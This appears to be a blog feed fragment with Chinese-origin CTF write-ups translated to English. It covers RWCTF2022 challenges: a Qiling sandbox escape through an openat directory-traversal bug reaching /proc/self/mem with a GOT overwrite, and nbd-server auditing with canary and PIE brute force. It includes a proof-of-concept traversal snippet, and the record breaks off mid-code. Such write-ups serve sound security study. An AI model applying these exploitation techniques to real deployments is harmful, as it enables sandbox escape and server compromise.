class="type">rt_ubase_t</span>)dev);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">            <span class="keyword">return</span> RT_EOK;</span><br><span class="line">        <span class="comment">/* post message to Ethernet thread */</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> -RT_ERROR; <span class="comment">/* netif is not initialized yet, just 
return. */</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>With that, the whole flow is laid out, and it matches the flowchart at the top of this post.</p><h2 id="八、参考">VIII. References</h2><ul><li><a href="https://www.bilibili.com/video/BV1D3411b7XY">揭秘VxWorks路由器破解之路 - 长亭 bilibili</a></li><li><a href="http://blog.r0b.re/ctf/pwn/arm/iot/goahead/backdoor/2022/01/23/realworldctf-flag.html">FLAG (PWN 451) RealWorldCTF - Sauercl0ud</a></li><li><a href="https://www.rt-thread.org/document/site/#/rt-thread-version/rt-thread-standard/application-note/components/network/an0010-lwip-driver-porting?id=%E7%BD%91%E7%BB%9C%E5%8D%8F%E8%AE%AE%E6%A0%88%E9%A9%B1%E5%8A%A8%E7%A7%BB%E6%A4%8D%E7%AC%94%E8%AE%B0">网络协议栈驱动移植笔记 - RT-Thread 文档中心</a></li><li><a href="http://blog.yanick.site/2021/03/25/os/rt-thread/rt-thread/">RT-Thread 简明阅读 - Yanick’s Blog</a></li><li><a href="https://club.rt-thread.org/ask/question/3392.html">RTT+LWIP icmp流</a></li></ul><h2 id="九、鸣谢">IX. Acknowledgements</h2><p>Special thanks to <strong>呆呆 for the technical walkthrough of the FLAG challenge</strong>.</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h2 id=&quot;简介&quot;&gt;Introduction&lt;/h2&gt;
&lt;p&gt;These are notes written while reviewing the FLAG challenge from RWCTF2022.&lt;/p&gt;
&lt;p&gt;The challenge is fairly complex, so it gets a post of its own.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Co-author: sakura&lt;/p&gt;
&lt;/blockquote&gt;
</summary>
      
    
    
    
    
    <category term="CTF" scheme="https://kiprey.github.io/tags/CTF/"/>
    
    <category term="Pwn" scheme="https://kiprey.github.io/tags/Pwn/"/>
    
  </entry>
  
  <entry>
    <title>RWCTF2022 Pwn Notes 1</title>
    <link href="https://kiprey.github.io/2022/01/rwctf2022_qws/"/>
    <id>https://kiprey.github.io/2022/01/rwctf2022_qws/</id>
    <published>2022-01-24T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:40.094Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are notes written while reviewing three RWCTF2022 challenges:</p><ul><li>QLaaS</li><li>Who Moved My Block</li><li>SVME</li></ul><blockquote><p>Because of limited time and efficiency, the exp for some challenges is not posted; only the detailed solving or exploitation process is recorded.</p></blockquote><!-- more ---><h2 id="二、QLaas">II. QLaaS</h2><h3 id="1-QLaas-小叙">1. QLaaS overview</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">Qiling as a Service.</span><br><span class="line">nc 47.242.149.197 7600</span><br><span class="line">QLaaS_61a8e641694e10ce360554241bdda977.tar.gz</span><br><span class="line">Note: read flag using /readflag</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:Schrödinger</span><br></pre></td></tr></table></figure><p>The challenge provides only the following script, which reads a file sent by the user and <strong>runs it inside the Qiling sandbox</strong> (with a temporary directory as the rootfs):</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span 
class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#!/usr/bin/env python3</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> tempfile</span><br><span class="line"><span class="comment"># pip install qiling==1.4.1</span></span><br><span class="line"><span class="keyword">from</span> qiling <span class="keyword">import</span> Qiling</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">my_sandbox</span>(<span class="params">path, rootfs</span>):</span><br><span class="line">    ql = Qiling([path], rootfs)</span><br><span class="line">    ql.run()</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">main</span>():</span><br><span class="line">    sys.stdout.write(<span class="string">&#x27;Your Binary(base64):\n&#x27;</span>)</span><br><span class="line">    line = sys.stdin.readline()</span><br><span class="line">    binary = base64.b64decode(line.strip())</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">with</span> tempfile.TemporaryDirectory() <span class="keyword">as</span> tmp_dir:</span><br><span class="line">        fp = os.path.join(tmp_dir, <span class="string">&#x27;bin&#x27;</span>)</span><br><span class="line"></span><br><span class="line">        <span class="keyword">with</span> <span class="built_in">open</span>(fp, <span class="string">&#x27;wb&#x27;</span>) <span class="keyword">as</span> f:</span><br><span class="line">            f.write(binary)</span><br><span class="line"></span><br><span class="line">        my_sandbox(fp, tmp_dir)</span><br><span 
class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">&#x27;__main__&#x27;</span>:</span><br><span class="line">    main()</span><br></pre></td></tr></table></figure><p>Goal: <strong>execute</strong> <code>/readflag</code> to obtain the flag (note that this is not the same as reading /flag directly).</p><h3 id="2-qiling-框架环境配置">2. qiling framework environment setup</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Clone the Qiling framework</span></span><br><span class="line">git <span class="built_in">clone</span> git@github.com:qilingframework/qiling.git</span><br><span class="line"><span class="built_in">cd</span> qiling</span><br><span class="line"><span class="comment"># Put the challenge attachment into the Qiling source tree</span></span><br><span class="line">nano main.py</span><br><span class="line"><span class="comment"># Create your own exp</span></span><br><span class="line"><span class="built_in">touch</span> exp.cpp</span><br><span class="line"></span><br><span class="line"><span class="comment"># Install PyCharm (don't debug with VSCode)</span></span><br></pre></td></tr></table></figure><h3 id="3-漏洞点">3. 
Vulnerability</h3><p>The unicorn framework is the core of qiling, and qiling implements a lot of extra functionality on top of it, including interaction with the OS. qiling implements its own set of syscalls and has the sandboxed program interact with the OS indirectly through these qiling syscalls.</p><p>If these qiling syscalls are flawed internally, however, the sandboxed program can use them to escape the sandbox.</p><p>By default, qiling logs the syscalls made by the sandboxed program while running it:</p><p><img src="/2022/01/rwctf2022_qws/image-20220124202600131.png" alt="image-20220124202600131"></p><p>From this, through string search, dynamic debugging and some searching for information, we can determine that the POSIX syscall implementations live in the <code>qiling/qiling/os/posix/syscall/</code> directory. What follows is code auditing plus debugging.</p><p>Through <s>being carried by the experts</s> auditing and debugging, we find a <strong>directory traversal vulnerability</strong> in the <code>ql_syscall_openat</code> function. To illustrate it, we first write a simple program that uses the open function and run it to see how qiling behaves:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span 
class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> fd = <span class="built_in">open</span>(<span class="string">&quot;../../../../../../../../proc/self/&quot;</span>, O_RDONLY, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>As the screenshot above shows, the syscall actually invoked is SYS_openat rather than SYS_open.</p><p>When <code>ql_syscall_openat</code> is called, the file is actually opened in the function <code>ql.os.fs_mapper.open_ql_file</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="keyword">def</span> <span class="title function_">ql_syscall_openat</span>(<span class="params">ql: Qiling, fd: <span class="built_in">int</span>, path: <span class="built_in">int</span>, flags: <span class="built_in">int</span>, mode: <span class="built_in">int</span></span>):</span><br><span class="line">    file_path = ql.os.utils.read_cstring(path)</span><br><span class="line">    <span class="comment"># real_path = ql.os.path.transform_to_real_path(path)</span></span><br><span class="line">    <span class="comment"># relative_path = ql.os.path.transform_to_relative_path(path)</span></span><br><span class="line"></span><br><span class="line">    flags &amp;= <span class="number">0xffffffff</span></span><br><span class="line">    mode &amp;= <span class="number">0xffffffff</span></span><br><span class="line"></span><br><span class="line">    idx = <span class="built_in">next</span>((i <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(NR_OPEN) <span class="keyword">if</span> ql.os.fd[i] == <span class="number">0</span>), -<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> idx == -<span class="number">1</span>:</span><br><span class="line">        regreturn = -EMFILE</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> ql.archtype== QL_ARCH.ARM:</span><br><span class="line">                mode = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">            flags = ql_open_flag_mapping(ql, flags)</span><br><span class="line">            fd = ql.unpacks(ql.pack(fd))</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> <span class="number">0</span> &lt;= fd &lt; NR_OPEN:</span><br><span 
class="line">                dir_fd = ql.os.fd[fd].fileno()</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                dir_fd = <span class="literal">None</span></span><br><span class="line"></span><br><span class="line">            <span class="comment"># 注意：在这里打开实际的文件，并将打开的文件描述符放入 fd array 中</span></span><br><span class="line">            ql.os.fd[idx] = ql.os.fs_mapper.open_ql_file(file_path, flags, mode, dir_fd)</span><br><span class="line"></span><br><span class="line">            regreturn = idx</span><br><span class="line">        <span class="keyword">except</span> QlSyscallError <span class="keyword">as</span> e:</span><br><span class="line">            regreturn = -e.errno</span><br><span class="line">            </span><br><span class="line">    ql.log.debug(<span class="string">f&#x27;openat(fd = <span class="subst">&#123;fd:d&#125;</span>, path = <span class="subst">&#123;file_path&#125;</span>, mode = <span class="subst">&#123;mode:#o&#125;</span>) = <span class="subst">&#123;regreturn:d&#125;</span>&#x27;</span>)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> regreturn</span><br></pre></td></tr></table></figure><p>继续读读 <code>ql.os.fs_mapper.open_ql_file</code> 函数源码。由于我们是尝试打开正常的文件，因此走下面 <code>else</code> 分支：</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">open_ql_file</span>(<span class="params">self, path, openflags, openmode, dir_fd=<span 
class="literal">None</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="variable language_">self</span>.has_mapping(path):</span><br><span class="line">        <span class="variable language_">self</span>.ql.log.info(<span class="string">f&quot;mapping <span class="subst">&#123;path&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._open_mapping_ql_file(path, openflags, openmode)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 进入该分支</span></span><br><span class="line">        <span class="keyword">if</span> dir_fd:</span><br><span class="line">            <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(path, openflags, openmode, dir_fd=dir_fd)</span><br><span class="line"></span><br><span class="line">        real_path = <span class="variable language_">self</span>.ql.os.path.transform_to_real_path(path)</span><br><span class="line">        <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(real_path, openflags, openmode)</span><br></pre></td></tr></table></figure><p>如果不存在 <code>dir_fd</code>，则调用 <code>transform_to_real_path</code> 函数将传入的 path 转换为真正的 path，即绝对路径。而调用 <code>transform_to_real_path</code> 处理 path 的调用链如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">convert_for_native_os, path.py:<span class="number">106</span></span><br><span class="line">convert_path, path.py:<span class="number">114</span></span><br><span class="line">transform_to_real_path, path.py:<span class="number">131</span></span><br><span 
class="line">open_ql_file, mapper.py:<span class="number">106</span></span><br><span class="line">ql_syscall_openat, fcntl.py:<span class="number">108</span></span><br><span class="line">[....]</span><br></pre></td></tr></table></figure><p>最终，qiling 会在 <code>convert_for_native_os</code> 函数中，<strong>过滤掉无效的目录穿越路径</strong>。</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@staticmethod</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">convert_for_native_os</span>(<span class="params">rootfs: <span class="type">Union</span>[<span class="built_in">str</span>, Path], cwd: <span class="built_in">str</span>, path: <span class="built_in">str</span></span>) -&gt; Path:</span><br><span class="line">    _rootfs = Path(rootfs)          <span class="comment"># _rootfs : /tmp/tmpldhylv0h</span></span><br><span class="line">    _cwd = PurePosixPath(cwd[<span class="number">1</span>:])   <span class="comment"># _cwd : .</span></span><br><span class="line">    _path = Path(path)              <span class="comment"># _path : ../../../../../../../../proc/self</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> _path.is_absolute():</span><br><span class="line">        <span class="keyword">return</span> _rootfs / QlPathManager.normalize(_path)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># 走该分支，返回 /tmp/tmpldhylv0h/proc/self</span></span><br><span class="line">        <span 
class="keyword">return</span> _rootfs / QlPathManager.normalize(_cwd / _path.as_posix())</span><br></pre></td></tr></table></figure><p>Back in the <code>open_ql_file</code> function shown earlier, <code>ql_file.open</code> is then called to interact with the OS, and that function performs no path filtering at all:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@classmethod</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">open</span>(<span class="params">cls, open_path: AnyStr, open_flags: <span class="built_in">int</span>, open_mode: <span class="built_in">int</span>, dir_fd: <span class="built_in">int</span> = <span class="literal">None</span></span>):</span><br><span class="line">    open_mode &amp;= <span class="number">0x7fffffff</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="comment"># The incoming path is handed to the OS as-is, with no filtering</span></span><br><span class="line">        fd = os.<span class="built_in">open</span>(open_path, open_flags, open_mode, dir_fd=dir_fd)</span><br><span class="line">    <span class="keyword">except</span> OSError <span class="keyword">as</span> e:</span><br><span class="line">        <span class="keyword">raise</span> QlSyscallError(e.errno, e.args[<span class="number">1</span>] + <span class="string">&#x27; : &#x27;</span> + e.filename)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> cls(open_path, fd)</span><br></pre></td></tr></table></figure><p>So does this mean the qiling openat syscall cannot be used for path traversal? Not quite. Look at this code in
<code>open_ql_file</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">open_ql_file</span>(<span class="params">self, path, openflags, openmode, dir_fd=<span class="literal">None</span></span>):</span><br><span class="line">    <span class="keyword">if</span> <span class="variable language_">self</span>.has_mapping(path):</span><br><span class="line">        <span class="variable language_">self</span>.ql.log.info(<span class="string">f&quot;mapping <span class="subst">&#123;path&#125;</span>&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> <span class="variable language_">self</span>._open_mapping_ql_file(path, openflags, openmode)</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="comment"># If a dir fd is given</span></span><br><span class="line">        <span class="keyword">if</span> dir_fd:</span><br><span class="line">            <span class="comment"># the path goes straight to the OS without any filtering</span></span><br><span class="line">            <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(path, openflags, openmode, dir_fd=dir_fd)</span><br><span class="line"></span><br><span class="line">        real_path = <span class="variable language_">self</span>.ql.os.path.transform_to_real_path(path)</span><br><span class="line">        <span class="keyword">return</span> ql_file.<span class="built_in">open</span>(real_path, openflags, 
openmode)</span><br></pre></td></tr></table></figure><p>So if we call the qiling openat syscall with a non-zero dir fd and a malicious traversal path, the path skips the rootfs conversion entirely and we can mount a <strong>directory traversal attack</strong>!</p><p>Let us try it:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;bits/stdc++.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;unistd.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/types.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;sys/stat.h&gt;</span></span></span><br><span class="line"><span class="meta">#<span class="keyword">include</span> <span class="string">&lt;fcntl.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> std;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="type">int</span> root_fd = <span class="built_in">open</span>(<span class="string">&quot;/&quot;</span>, O_RDONLY);</span><br><span class="line">    <span class="type">int</span> mem_fd = <span class="built_in">openat</span>(root_fd, <span 
class="string">&quot;../../../../proc/self/mem&quot;</span>, O_RDWR, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Both SYS_openat calls succeed, so the directory traversal works:</p><p><img src="/2022/01/rwctf2022_qws/image-20220124212115135.png" alt="image-20220124212115135"></p><p>Once we can traverse directories, we can try to read and write arbitrary files.</p><p>The flag can only be obtained by executing <code>/readflag</code>, so reading files is not enough and we need code execution. For that we can try reading and writing <code>/proc/self/mem</code>.</p><p>This file exposes the memory of the process. Modifying it is equivalent to modifying the virtual address space of the process directly, so we can try to place our own shellcode in a code segment and execute it.</p><p>Note that this file <strong>cannot be read blindly</strong>: the read offset has to be chosen using the mapping information in <strong>/proc/self/maps</strong>, because unmapped regions cannot be read.</p><h3 id="4-利用流程">4. Exploitation flow</h3><p>The exploitation flow is as follows:</p><ul><li>First run: read <code>/proc/self/exe</code> to dump the python binary from the remote machine to the local machine, and obtain the relative offset of its GOT.</li><li>Second run: read <code>/proc/self/maps</code>:<ul><li>Get the base address of the python program on the remote machine and add the relative GOT offset to obtain the absolute address of the GOT.</li><li>Get the address of the executable code segment of the python program on the remote machine and write the shellcode into it.</li><li>Overwrite a GOT entry with the shellcode address, then trigger the function whose GOT entry was modified so that python executes the shellcode.</li></ul></li></ul><blockquote><p>Exploiting this challenge is fairly simple, so I skipped writing the exp.</p></blockquote><h2 id="三、Who-Moved-My-Block">III. Who Moved My Block</h2><h3 id="1-wmmb-小叙">1. wmmb overview</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">On Linux, network block device (NBD) is a network protocol that can be used to forward a block device (typically a hard disk or partition) from one machine to a second machine. 
As an example, a local machine can access a hard disk drive that is attached to another computer.</span><br><span class="line">https://github.com/NetworkBlockDevice/nbd</span><br><span class="line">nc 47.242.113.232 31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:baby</span><br></pre></td></tr></table></figure><h3 id="2-wmmb-环境搭建">2. wmmb environment setup</h3><p>Check which protections are enabled on the provided binary (wow, every single one is on):</p><p><img src="/2022/01/rwctf2022_qws/image-20220125115931741.png" alt="image-20220125115931741"></p><p>Download the source and build it:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">wget https://versaweb.dl.sourceforge.net/project/nbd/nbd/3.23/nbd-3.23.tar.gz</span><br><span class="line">tar -xvf nbd-3.23.tar.gz</span><br><span class="line"><span class="built_in">cd</span> nbd-3.23</span><br><span class="line">./configure --enable-debug</span><br><span class="line"><span class="comment"># Build with Full RELRO, Canary, NX and PIE enabled</span></span><br><span class="line">make <span class="string">&quot;CFLAGS += -fstack-protector-all -pie -z now -z noexecstack&quot;</span></span><br><span class="line"><span class="comment"># make install</span></span><br><span class="line"></span><br><span class="line">./nbd-server 0.0.0.0:10809 <span class="variable">$&#123;PWD&#125;</span>/../WhoMovedMyBlock/container/rootfs.ext2</span><br><span class="line"><span class="comment"># Note: when run directly, nbd-server prints its messages and then the **foreground process** immediately becomes a background process, handing control back to the shell</span></span><br><span class="line"><span class="comment"># The process keeps running in the background and can be found with the following command</span></span><br><span class="line">ps -ax | grep <span
class="string">&quot;nbd&quot;</span></span><br></pre></td></tr></table></figure><p><img src="/2022/01/rwctf2022_qws/image-20220124222106716.png" alt="image-20220124222106716"></p><blockquote><p>When debugging, if you do not want the process to move to the background, add this flag when running make: <code>make &quot;CFLAGS += -DNODAEMON&quot;</code></p></blockquote><h3 id="3-漏洞点-2">3. Vulnerabilities</h3><h4 id="a-漏洞寻找">a. Finding the bugs</h4><p>An nbd-server runs on the remote machine, so we clearly need to connect to it and craft some malicious fields in the payload we send.</p><p>That means auditing the code (located in <code>nbd-3.23/nbd-server.c</code>) to find a path of the form <strong>untrusted input -&gt; no filtering -&gt; memory access</strong>.</p><p>We start from the <code>accept</code> function, the starting point of every socket connection. Following its cross references leads to the function that handles connections, <code>handle_modern_connection</code>:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span 
class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">handle_modern_connection</span><span class="params">(GArray *<span class="type">const</span> servers, <span class="type">const</span> <span class="type">int</span> sock, <span class="keyword">struct</span> generic_conf *genconf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    net = <span class="built_in">socket_accept</span>(sock);</span><br><span class="line">    <span class="keyword">if</span> (net &lt; <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (!dontfork) &#123;</span><br><span class="line">        <span class="comment">// Important: a child process is forked here to handle the new connection on its own</span></span><br><span class="line">        pid = <span class="built_in">spawn_child</span>(&amp;commsocket);</span><br><span class="line">        <span class="keyword">if</span> (pid) &#123;</span><br><span class="line">            <span class="keyword">if</span> (pid &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="built_in">msg</span>(LOG_INFO, <span class="string">&quot;Spawned a child process&quot;</span>);</span><br><span class="line">                <span class="built_in">g_array_append_val</span>(childsocks, commsocket);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (pid &lt; <span class="number">0</span>)</span><br><span class="line">                <span class="built_in">msg</span>(LOG_ERR, <span 
class="string">&quot;Failed to spawn a child process&quot;</span>);</span><br><span class="line">            <span class="built_in">close</span>(net);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">/* Child just continues. */</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Negotiate the connection</span></span><br><span class="line">    client = <span class="built_in">negotiate</span>(net, servers, genconf);</span><br><span class="line">       </span><br><span class="line">    [...]</span><br><span class="line">       </span><br><span class="line">    <span class="built_in">msg</span>(LOG_INFO, <span class="string">&quot;Starting to serve&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Start serving</span></span><br><span class="line">    <span class="built_in">mainloop_threaded</span>(client);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_SUCCESS);</span><br><span class="line">handler_err:</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br><span class="line">        </span><br></pre></td></tr></table></figure><p>Note that by default the server forks a new child process for every connection. This matters a lot: every forked child inherits the same canary and memory layout from the parent, so we can <strong>brute-force the canary and PIE</strong> across repeated connections.</p><p><img src="/2022/01/rwctf2022_qws/image-20220125123033017.png" alt="image-20220125123033017"></p><p>This function calls <code>negotiate</code>, which creates a <code>CLIENT</code> structure and assigns the fd of the new connection to it. From then on, <code>socket_read(client, addr, len)</code> is used to read data from the client (that is, from us).</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span 
